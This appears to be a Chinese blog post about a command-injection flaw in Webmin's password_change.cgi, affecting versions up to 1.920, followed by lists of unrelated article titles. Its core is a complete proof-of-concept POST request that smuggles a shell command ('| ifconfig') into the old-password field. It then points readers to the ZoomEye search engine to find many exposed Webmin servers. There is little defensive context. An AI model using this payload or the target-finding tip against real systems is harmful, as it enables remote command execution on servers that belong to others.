简单介绍：

　　Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前Webmin支持绝大多数的Unix系统，这些系统除了各种版本的linux以外还包括：AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。Webmin 能够在远程使用支持 HTTPS协议的 Web 浏览器通过 Web 界面管理主机。

漏洞原理：在重置密码功能password_changge.cgi中发现了一个错误，该错误允许恶意第三方由于缺少输入验证而执行恶意代码

影响版本：一直到最新的1.920版本，存在于更换用户密码这个功能中。

poc：

POST /password_changge.cgi HTTP/1.1

Host: ip:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/ Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 69

Connection: close

Upgrade-Insecure-Requests: 1

user=root&pam=&expire=2&old=AkkuS  |  ifconfig&new1=akkuss&new2=akuss

• 但是，利用的前提是 已知root或其他账户的旧密码，在钟馗之眼查询webmin可以看到很多在线服务器。

最新文章

1. ACM:UESTC - 649 括号配对问题 - stack
2. Android百度地图附加搜索和公交路线方案搜索
3. ifconfig
4. 2013年第四届蓝桥杯C/C++程序设计本科B组决赛
5. css 强制换行
6. 【J2EE】struts-2.3.16.3+apache-tomcat-8.0.9开发环境部署，“Hello World”的实现。
7. SPOJ 1487 Query on a tree III（划分树）
8. PyCharm常用设置
9. MongoDB 启动异常
10. Unity UGUI——开源
11. SPOJ - BITDIFF: Bit Difference [神妙の预处理]
12. Zab: A simple totally ordered broadcast protocol（译）
13. Vue.js安装
14. js定义数组的方法
15. Jetson TX1 install Opencv3
16. Linux时间戳转换成BCD码（转载）
17. FineUI开源版（ASP.Net）初学手册-部分JS整理
18. [JOISC2014]スタンプラリー
19. prop和attr的比较
20. ORACLE之PACKAGE-包、存储过程、函数

热门文章

1. sql-lib闯关61-65
2. POJ - 1061 青蛙的约会 扩展欧几里得 + （贝祖公式）最小正整数解
3. CSRF的几种防御方法的利弊分析
4. 以个人身份加入.NET基金会
5. [noip模拟]数字对<RMQ&二分>
6. nginx代理图片访问
7. Activiti任务分配
8. Android | 教你如何用代码一键实现银行卡绑定
9. PTA | 1012 数字分类 (20分)
10. git基础使用合集